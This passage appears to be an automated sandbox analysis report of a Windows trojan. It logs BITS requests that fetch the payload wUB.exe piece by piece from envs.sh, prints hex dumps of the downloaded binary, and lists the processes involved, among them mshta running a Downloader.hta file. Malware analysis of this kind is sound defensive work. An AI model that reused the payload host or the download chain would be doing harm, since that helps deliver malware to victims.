                                            2024-09-16 10:23:23 UTC283INData Raw: 6f 7f 00 00 0a a2 09 1f 09 7e 1a 00 00 04 28 22 00 00 0a a2 09 1f 0a 7e 0c 00 00 04 a2 09 1f 0b 7e 1a 00 00 04 28 22 00 00 0a a2 09 1f 0c 28 57 00 00 06 a2 09 1f 0d 7e 1a 00 00 04 28 22 00 00 0a a2 09 1f 0e 28 58 00 00 06 a2 09 1f 0f 7e 1a 00 00 04 28 22 00 00 0a a2 09 1f 10 28 59 00 00 06 a2 09 1f 11 7e 1a 00 00 04 28 22 00 00 0a a2 09 1f 12 28 9c 00 00 06 8c 43 00 00 01 a2 09 1f 13 7e 1a 00 00 04 28 22 00 00 0a a2 09 1f 14 28 5c 00 00 06 a2 09 1f 15 7e 1a 00 00 04 28 22 00 00 0a a2 09 1f 16 28 5b 00 00 06 a2 09 1f 17 7e 1a 00 00 04 28 22 00 00 0a a2 09 1f 18 28 5d 00 00 06 a2 09 1f 19 7e 1a 00 00 04 28 22 00 00 0a a2 09 1f 1a 28 5a 00 00 06 a2 09 28 84 00 00 0a 0a 2b 00 06 2a 1b 30 02 00 40 00 00 00 14 00 00 11 7e 30 00 00 04 73 33 00 00 0a 0b 07 6f 85
                                            Data Ascii: o~("~~("(W~("(X~("(Y~("(C~("(\~("([~("(]~("(Z(+*0@~0s3o


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            25192.168.2.44977389.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:26 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=5998-6078
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:26 UTC421INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:26 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 81
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 5998-6078/80384
                                            2024-09-16 10:23:26 UTC81INData Raw: 72 d2 0a 00 70 0a 28 31 00 00 0a de 07 28 31 00 00 0a de 00 06 2a 01 10 00 00 00 00 00 00 23 23 00 1b 33 00 00 01 1b 30 03 00 49 00 00 00 15 00 00 11 7e 30 00 00 04 28 60 00 00 0a 7e 0d 00 00 04 16 28 6a 00 00 0a 16 33 0a 72 a8 0a 00 70 0a de
                                            Data Ascii: rp(1(1*##30I~0(`~(j3rp


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            26192.168.2.44977489.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:29 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6079-6087
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:29 UTC420INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:29 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 9
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6079-6087/80384
                                            2024-09-16 10:23:29 UTC9INData Raw: 27 2b 08 72 90 0a 00 70 0a
                                            Data Ascii: '+rp


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            27192.168.2.44977589.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:33 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6088-6168
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:33 UTC421INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:33 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 81
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6088-6168/80384
                                            2024-09-16 10:23:33 UTC81INData Raw: de 1d de 1b 25 28 2f 00 00 0a 0b 72 d2 0a 00 70 0a 28 31 00 00 0a de 07 28 31 00 00 0a de 00 06 2a 00 00 00 01 10 00 00 00 00 00 00 2c 2c 00 1b 33 00 00 01 1b 30 02 00 3e 00 00 00 16 00 00 11 28 87 00 00 0a 73 88 00 00 0a 20 20 02 00 00 6f 89
                                            Data Ascii: %(/rp(1(1*,,30>(s o


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            28192.168.2.44977689.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:37 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6169-6250
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:37 UTC421INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:37 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 82
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6169-6250/80384
                                            2024-09-16 10:23:37 UTC82INData Raw: 00 00 0a 0c 12 02 28 83 00 00 0a 0a de 1d de 1b 25 28 2f 00 00 0a 0b 72 d2 0a 00 70 0a 28 31 00 00 0a de 07 28 31 00 00 0a de 00 06 2a 00 00 01 10 00 00 00 00 00 00 21 21 00 1b 33 00 00 01 1b 30 04 00 cf 00 00 00 17 00 00 11 72 de 0a 00 70 28 8a
                                            Data Ascii: (%(/rp(1(1*!!30rp(


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            29192.168.2.44977789.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:42 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6251-6394
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:42 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:42 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 144
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6251-6394/80384
                                            2024-09-16 10:23:42 UTC144INData Raw: 00 00 0a 72 e4 0a 00 70 28 32 00 00 0a 72 10 0b 00 70 73 8b 00 00 0a 0b 73 8c 00 00 0a 0c 07 6f 8d 00 00 0a 6f 8e 00 00 0a 13 05 2b 2b 11 05 6f 8f 00 00 0a 0d 08 09 72 4e 0b 00 70 6f 90 00 00 0a 6f 26 00 00 0a 6f 91 00 00 0a 26 08 72 66 0b 00 70 6f 91 00 00 0a 26 11 05 6f 92 00 00 0a 2d cc de 0c 11 05 2c 07 11 05 6f 5a 00 00 0a dc 08 6f 93 00 00 0a 6f 94 00 00 0a 16 33 08 72 6a 0b 00 70 0a de 41 08 6f 93 00 00 0a 16 08 6f 95 00
                                            Data Ascii: rp(2rpssoo++orNpoo&o&rfpo&o-,oZoo3rjpAoo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            30192.168.2.44977889.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:46 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6395-6623
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:46 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:46 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 229
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6395-6623/80384
                                            2024-09-16 10:23:46 UTC229INData Raw: 00 0a 17 da 6f 96 00 00 0a 0a de 2a de 0a 07 2c 06 07 6f 5a 00 00 0a dc de 1c 25 28 2f 00 00 0a 13 04 72 6a 0b 00 70 0a 28 31 00 00 0a de 07 28 31 00 00 0a de 00 06 2a 00 01 28 00 00 02 00 25 00 45 6a 00 0c 00 00 00 00 02 00 1f 00 86 a5 00 0a 00 00 00 00 00 00 00 00 b1 b1 00 1c 33 00 00 01 1b 30 03 00 8f 00 00 00 18 00 00 11 7e 97 00 00 0a 0d 72 74 0b 00 70 73 98 00 00 0a 0b 07 73 99 00 00 0a 0c 08 6f 8d 00 00 0a 6f 8e 00 00 0a 13 05 2b 30 11 05 6f 8f 00 00 0a 74 65 00 00 01 13 04 09 11 04 72 bc 0b 00 70 6f 90 00 00 0a 28 9a 00 00 0a 72 8c 0a 00 70 28 9a 00 00 0a 28 2d 00 00 0a 0d 11 05 6f 92 00 00 0a 2d c7 de 0c 11 05 2c 07 11 05 6f 5a 00 00 0a dc 09 0a de 1b de 19 28 2f 00 00
                                            Data Ascii: o*,oZ%(/rjp(1(1*(%Ej30~rtpssoo+0oterpo(rp((-o-,oZ(/


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            31192.168.2.44977989.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:50 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6624-6716
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:50 UTC421INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:50 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 93
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6624-6716/80384
                                            2024-09-16 10:23:50 UTC93INData Raw: 0a 72 d2 0a 00 70 0a 28 31 00 00 0a de 07 28 31 00 00 0a de 00 06 2a 00 01 1c 00 00 02 00 18 00 4a 62 00 0c 00 00 00 00 00 00 00 00 74 74 00 19 33 00 00 01 1b 30 03 00 83 00 00 00 19 00 00 11 72 c6 0b 00 70 73 9b 00 00 0a 0b 07 6f 9c 00 00 0a 07 72 bc 0b 00 70 6f 90 00 00 0a 6f
                                            Data Ascii: rp(1(1*Jbtt30rpsorpoo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            32192.168.2.44978089.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:54 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6717-6852
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:54 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:54 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 136
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6717-6852/80384
                                            2024-09-16 10:23:54 UTC136INData Raw: 26 00 00 0a 72 06 0c 00 70 72 e0 04 00 70 6f 7f 00 00 0a 72 0e 0c 00 70 72 e0 04 00 70 6f 7f 00 00 0a 72 20 0c 00 70 72 e0 04 00 70 6f 7f 00 00 0a 0a de 30 07 72 bc 0b 00 70 6f 90 00 00 0a 6f 26 00 00 0a 0a de 1d de 1b 25 28 2f 00 00 0a 0c 72 d2 0a 00 70 0a 28 31 00 00 0a de 07 28 31 00 00 0a de 00 06 2a 00 01 10 00 00 00 00 00 00 66 66 00 1b 33 00 00 01 1b 30 04 00 b9 00 00 00 1a 00 00 11 14 0c 28 08 00
                                            Data Ascii: &rprporprpor prpo0rpoo&%(/rp(1(1*ff30(


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            33192.168.2.44978189.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:57 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6853-6880
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:58 UTC421INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:57 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 28
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6853-6880/80384
                                            2024-09-16 10:23:58 UTC28INData Raw: 00 06 6f 9d 00 00 0a 6f 9e 00 00 0a 8c 66 00 00 01 28 9f 00 00 0a 28 a0 00 00 0a b9
                                            Data Ascii: oof((


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            34192.168.2.44978289.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:24:01 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=6881-7029
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:24:02 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:24:01 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 149
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 6881-7029/80384
                                            2024-09-16 10:24:02 UTC149INData Raw: 0b 07 20 00 00 00 40 6a 31 32 07 6c 23 00 00 00 00 00 00 d0 41 5b 13 04 12 04 28 a1 00 00 0a 0c 08 1a 08 6f 94 00 00 0a 1a da 6f a2 00 00 0a 72 28 0c 00 70 28 2b 00 00 0a 0c 2b 39 07 20 00 00 10 00 6a 31 30 07 6c 23 00 00 00 00 00 00 30 41 5b 13 04 12 04 28 a1 00 00 0a 0c 08 1a 08 6f 94 00 00 0a 1a da 6f a2 00 00 0a 72 30 0c 00 70 28 2b 00 00 0a 0c 08 0a de 1d de 1b 25 28 2f 00 00 0a 0d 72 d2 0a 00 70 0a 28 31 00 00 0a de 07 28 31 00 00 0a de
                                            Data Ascii: @j12l#A[(oor(p(++9 j10l#0A[(oor0p(+%(/rp(1(1


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            35192.168.2.44978389.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:24:06 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=7030-7122
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:24:06 UTC421INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:24:06 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 93
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 7030-7122/80384
                                            2024-09-16 10:24:06 UTC93INData Raw: 00 06 2a 00 00 00 01 10 00 00 00 00 00 00 9c 9c 00 1b 33 00 00 01 1b 30 08 00 c5 01 00 00 1b 00 00 11 7e 12 00 00 04 2d 05 38 b8 01 00 00 7e 13 00 00 04 02 6f a3 00 00 0a 0a 06 16 3e 56 01 00 00 7e 14 00 00 04 15 6a 40 a6 00 00 00 7e 15 00 00 04 16 91 16 40 83 00 00 00 7e 16 00
                                            Data Ascii: *30~-8~o>V~j@~@~


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            36192.168.2.44978489.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:24:10 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=7123-7371
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:24:10 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:24:10 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 249
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 7123-7371/80384
                                            2024-09-16 10:24:10 UTC249INData Raw: 00 04 6f a4 00 00 0a 28 30 01 00 06 28 a5 00 00 0a 80 14 00 00 04 7e 16 00 00 04 6f a6 00 00 0a 73 74 00 00 0a 80 16 00 00 04 7e 14 00 00 04 16 6a 33 36 15 6a 80 14 00 00 04 7e 13 00 00 04 7e 15 00 00 04 16 7e 15 00 00 04 8e b7 16 14 fe 06 5e 00 00 06 73 79 00 00 0a 7e 13 00 00 04 6f 7a 00 00 0a 26 dd 20 01 00 00 7e 14 00 00 04 17 6a da b7 17 d6 8d 58 00 00 01 80 15 00 00 04 2b 11 7e 16 00 00 04 7e 15 00 00 04 16 91 6f a7 00 00 0a 38 a2 00 00 00 7e 16 00 00 04 7e 15 00 00 04 16 06 6f a8 00 00 0a 7e 16 00 00 04 6f a9 00 00 0a 7e 14 00 00 04 33 60 14 fe 06 66 00 00 06 73 aa 00 00 0a 73 ab 00 00 0a 0b 07 14 72 38 0c 00 70 17 8d 03 00 00 01 0d 09 16 7e 16 00 00 04 6f a4 00 00 0a a2 09 14 14 14 17 28 4e 00 00 0a 26 15 6a 80 14 00 00 04 7e 16
                                            Data Ascii: o(0(~ost~j36j~~~^sy~oz& ~jX+~~o8~~o~o~3`fssr8p~o(N&j~


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            37192.168.2.44978589.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:24:14 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=7372-7600
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:24:14 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:24:14 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 229
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 7372-7600/80384
                                            2024-09-16 10:24:14 UTC229INData Raw: 00 00 04 6f a6 00 00 0a 73 74 00 00 0a 80 16 00 00 04 17 8d 58 00 00 01 80 15 00 00 04 2b 20 7e 14 00 00 04 7e 16 00 00 04 6f a9 00 00 0a da 17 6a da b7 17 d6 8d 58 00 00 01 80 15 00 00 04 2b 08 16 80 12 00 00 04 de 47 7e 13 00 00 04 7e 15 00 00 04 16 7e 15 00 00 04 8e b7 16 14 fe 06 5e 00 00 06 73 79 00 00 0a 7e 13 00 00 04 6f 7a 00 00 0a 26 de 1b 25 28 2f 00 00 0a 0c 16 80 12 00 00 04 28 31 00 00 0a de 07 28 31 00 00 0a de 00 2a 00 00 00 41 1c 00 00 00 00 00 00 0c 00 00 00 9d 01 00 00 a9 01 00 00 1b 00 00 00 33 00 00 01 1b 30 02 00 17 00 00 00 1c 00 00 11 02 28 93 00 00 06 de 0e 25 28 2f 00 00 0a 0a 28 31 00 00 0a de 00 2a 00 01 10 00 00 00 00 00 00 08 08 00 0e 33 00 00 01 1b
                                            Data Ascii: ostX+ ~~ojX+G~~~^sy~oz&%(/(1(1*A30(%(/(1*3


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            38192.168.2.44978689.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:24:19 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=7601-7780
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:24:19 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:24:19 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 180
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 7601-7780/80384
                                            2024-09-16 10:24:19 UTC180INData Raw: 30 07 00 c9 00 00 00 1d 00 00 11 7e 19 00 00 04 13 04 11 04 28 ac 00 00 0a 16 13 05 11 04 12 05 28 ad 00 00 0a 7e 12 00 00 04 39 96 00 00 00 73 74 00 00 0a 0a 02 28 2f 01 00 06 28 37 01 00 06 0b 07 8e b7 28 ae 00 00 0a 72 44 0c 00 70 28 2b 00 00 0a 28 2f 01 00 06 0c 06 08 16 08 8e b7 6f a8 00 00 0a 06 07 16 07 8e b7 6f a8 00 00 0a 7e 13 00 00 04 15 17 6f af 00 00 0a 26 7e 13 00 00 04 06 6f a4 00 00 0a 16 06 6f a9 00 00 0a b7 16 14 fe 06 61 00 00 06 73 79 00 00 0a 14 6f b0 00 00 0a 26 de 0a 06 2c 06 06 6f 5a 00 00 0a dc de 14 25 28 2f
                                            Data Ascii: 0~((~9st(/(7(rDp(+(/oo~o&~ooasyo&,oZ%(/


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            39192.168.2.44978789.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:24:23 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=7781-7860
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:24:23 UTC421INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:24:23 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 80
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 7781-7860/80384
                                            2024-09-16 10:24:23 UTC80INData Raw: 00 00 0a 0d 16 80 12 00 00 04 28 31 00 00 0a de 00 de 0c 11 05 2c 07 11 04 28 b1 00 00 0a dc 2a 00 00 00 01 28 00 00 02 00 2a 00 70 9a 00 0a 00 00 00 00 00 00 24 00 82 a6 00 14 33 00 00 01 02 00 11 00 ab bc 00 0c 00 00 00 00 1b 30 02 00 23
                                            Data Ascii: (1,(*(*p$30#


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:06:22:19
                                            Start date:16/09/2024
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe"
                                            Imagebase:0xb90000
                                            File size:1'010'176 bytes
                                            MD5 hash:7AFABB528CE69E3A40DEC6C3253EF854
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:06:22:20
                                            Start date:16/09/2024
                                            Path:C:\Windows\SysWOW64\mshta.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                            Imagebase:0x850000
                                            File size:13'312 bytes
                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:2
                                            Start time:06:22:20
                                            Start date:16/09/2024
                                            Path:C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe"
                                            Imagebase:0x226e67e0000
                                            File size:995'840 bytes
                                            MD5 hash:90FD25CED85FE6DB28D21AE7D1F02E2C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 75%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:06:22:20
                                            Start date:16/09/2024
